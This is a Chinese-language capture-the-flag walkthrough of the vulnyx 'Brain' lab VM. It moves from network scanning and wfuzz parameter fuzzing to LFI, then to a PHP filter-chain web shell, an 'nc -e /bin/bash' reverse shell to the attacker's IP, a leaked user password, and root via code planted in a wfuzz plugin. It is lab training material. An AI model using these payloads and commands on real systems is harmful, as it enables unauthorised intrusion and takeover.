vulnyx靶机：Brain

简介

vulnyx是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag。

部署方法

官网：https://vulnyx.com/

1.在官网搜索你想要的镜像,然后下载

2.下载好后解压得到.ova的文件，右击选择VMware进行打开

3.在弹出的框中，选择存放的位置，然后点击导入

4.最后等待导入完成，然后启动该虚拟机就可以了

一，信息收集

我是用kali的arp-scan，也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。

arp-scan -I eth1 -l

• -I 指定eth1这个网卡
• -l 扫描出全部主机

我们知道靶机的IP地址在192.168.30.36后使用namp扫描靶机。

nmap 192.168.30.36 -A -O -p 1-65535

• -A 进行全面扫描，包括服务版本探测、操作系统检测等。
• -O 进行操作系统检测，尝试识别远程主机的操作系统类型。
• -p 指定要扫描的端口范围或特定端口，如1-65535或80,443。

开放22，80端口。没有CMS，80端口给了一个很奇怪的东西。扫一下目录。目录就/index.php而已。

那看来就是/index.php有漏洞了。

wfuzz -u http://192.168.30.36/index.php?FUZZ=../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hh 361

爆破一下参数。这里也可以用抓包爆破。

192.168.30.36/index.php?include=../../../../../etc/passwd

ben用户很可疑。我记得之前有分享php_filter_chain_generator.py这个脚本。这个脚本可以生成 PHP 过滤器链。之前那个靶机就是这样拿到shell的。

python3 php_filter_chain_generator.py --chain "<?php system(\$_GET['aaa']);?>"

是可以用的，那就弹shell回来。

nc -e /bin/bash 192.168.30.3 4444

安排老三套。

这里给了个像密码的东西。

ben
B3nP4zz

直接就可以登录。继续跑一下脚本。

可以提权到root。但是这个wfuzz没有可以直接使用的提权命令。

这里原本想拿私钥但是他没有。那就拿了个密码过来。

这个密码爆破不出来。进修一下。

在这里还可以提权。

nano /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py

import os
os.system('bash -i')

在里面添加一下。然后随便运行一下wfuzz就可以拿到root了。

这样就拿到root了。

后续

这个靶机还挺有意思的。